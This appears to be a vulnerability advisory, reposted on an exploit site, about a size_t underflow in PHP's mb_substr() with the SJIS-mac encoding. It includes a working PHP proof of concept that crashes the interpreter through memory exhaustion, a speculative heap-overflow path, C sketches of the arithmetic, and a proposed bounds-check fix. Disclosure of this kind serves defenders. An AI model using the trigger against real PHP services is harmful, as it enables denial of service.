## https://sploitus.com/exploit?id=PACKETSTORM:223961
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
    
    **Author:** Khashayar Fereidani
    **Disclosure Date:** 2026-06-18
    **Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
    **Contact:** https://fereidani.com/contact
    
    ## Description
    
    The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
    deliberately exempts the `SJIS-mac` encoding from its early
    empty-string return guard for `from >= in_len`. Execution therefore
    falls through to `mb_get_substr_slow()`, which calls
    `mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);`. When
    `from > in_len`, the expression `in_len - from` underflows `size_t`
    and yields an allocation size close to 2^64 bytes. This leads to an
    immediate Out-Of-Memory (OOM) fatal error. Furthermore, if
    `_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
    potentially allocate a tiny buffer while the buffer limit is still
    computed from the huge underflowed size, resulting in a heap buffer
    overflow when subsequent codepoints are decoded and written.
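    
    The arithmetic behind both outcomes can be sketched in plain C. This
    is only an illustration, not code from PHP: the function names and
    `SKETCH_ZSTR_OVERHEAD` are hypothetical, and the value 25 (a 24-byte
    string header plus one trailing NUL byte) is an assumption about a
    typical 64-bit build.
    
    ```c
    #include <stddef.h>
    #include <stdint.h>
    
    /* Assumed stand-in for the overhead that _ZSTR_STRUCT_SIZE adds:
     * 24-byte header + 1 NUL byte on a typical 64-bit build. */
    #define SKETCH_ZSTR_OVERHEAD ((size_t)25)
    
    /* Mirrors MIN(len, in_len - from) without any guard.
     * Unsigned subtraction wraps modulo SIZE_MAX + 1 when from > in_len. */
    size_t sketch_initsize(size_t len, size_t in_len, size_t from)
    {
        size_t remaining = in_len - from;
        return len < remaining ? len : remaining;
    }
    
    /* Mirrors the size handed to the allocator: the hint plus a fixed
     * overhead. The addition can wrap a second time. */
    size_t sketch_alloc_size(size_t initsize)
    {
        return SKETCH_ZSTR_OVERHEAD + initsize;
    }
    ```
    
    Under these assumptions, `sketch_initsize(SIZE_MAX, 3, 1000000)`
    gives `SIZE_MAX - 999996`, and adding the overhead gives
    `SIZE_MAX - 999971`, a request the allocator cannot satisfy. With
    `from` only one past the end, `sketch_initsize(SIZE_MAX, 3, 4)` is
    `SIZE_MAX`, and the overhead addition wraps to 24 bytes, which is the
    small-allocation case described above.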
    
    ## Proof of concept
    
    ```php
    <?php
    /*
     * PoC: mb_substr() 'SJIS-mac' size_t underflow
     * File:  ext/mbstring/mbstring.c  mb_get_substr() (~L2129) +
     *        mb_get_substr_slow() (~L2102)
     *
     * mb_get_substr() deliberately skips the early "return empty" guard
     * for SJIS-mac:
     *
     *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
     *         return zend_empty_string;     // <-- sjis_mac bypasses this
     *                                       //     when from >= in_len
     *     }
     *
     * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
     * mb_get_substr_slow(), whose first line is:
     *
     *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
     *
     * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
     * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
     *
     * Two outcomes, both wrong (correct result is the empty string):
     *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
     *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
     *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
     *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
     *      while buf->limit = out + initsize stays wild -> a subsequent write of
     *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
     *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
     *      from < codepoint_count while from > byte_count. Worth upstream review.)
     */
    echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
         (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
    
    /* control: a normal encoding with from > strlen returns "" cleanly */
    echo "UTF-8, from=10 > strlen('abc'): -> ";
    var_dump(@mb_substr("abc", 10, null, "UTF-8"));
    
    /* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
     * The "tried to allocate 18...644 bytes" figure is (size_t)(3 - 1000000) plus
     * the 25 bytes of string overhead that _ZSTR_STRUCT_SIZE adds on 64-bit. */
    echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
    @mb_substr("abc", 1000000, null, "SJIS-mac");
    echo "(if you see this line, the fatal error above was caught/suppressed)\n";
    ```
    
    ## Impact
    
    An attacker who can cause `mb_substr()` to be called with `from >
    in_len` and the 'SJIS-mac' encoding triggers a `size_t` underflow.
    This predictably causes an Out-Of-Memory (OOM) fatal error, resulting
    in a Denial of Service. Depending on environmental details, it might
    hypothetically cause a heap buffer overflow.
    
    ## Solution
    
    Add a bounds check to `mb_get_substr()` and `mb_get_substr_slow()` in
    `ext/mbstring/mbstring.c`. The expression `in_len - from` should be
    evaluated only when `from <= in_len`. Otherwise the code should
    either stop early or clamp the value to zero, so that no underflowed
    size reaches the string buffer initialization.
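    
    The clamping variant of this check might look like the following
    sketch. It is not the upstream patch: `sketch_safe_initsize` is a
    hypothetical helper, and it assumes that a size hint of zero is
    acceptable to the buffer initialization because the buffer can grow
    as codepoints are written.
    
    ```c
    #include <stddef.h>
    #include <stdint.h>
    
    /* Hypothetical helper: computes the initial size hint without ever
     * performing an unsigned subtraction that could wrap. */
    size_t sketch_safe_initsize(size_t len, size_t in_len, size_t from)
    {
        if (from >= in_len) {
            return 0; /* start offset is at or past the end: clamp to zero */
        }
        size_t remaining = in_len - from; /* safe here because from < in_len */
        return len < remaining ? len : remaining;
    }
    ```
    
    With this guard, `sketch_safe_initsize(SIZE_MAX, 3, 1000000)` returns
    0 instead of a value near `SIZE_MAX`. Only the size hint is clamped,
    so an encoding that is deliberately allowed past the early guard
    would still reach the decoding loop.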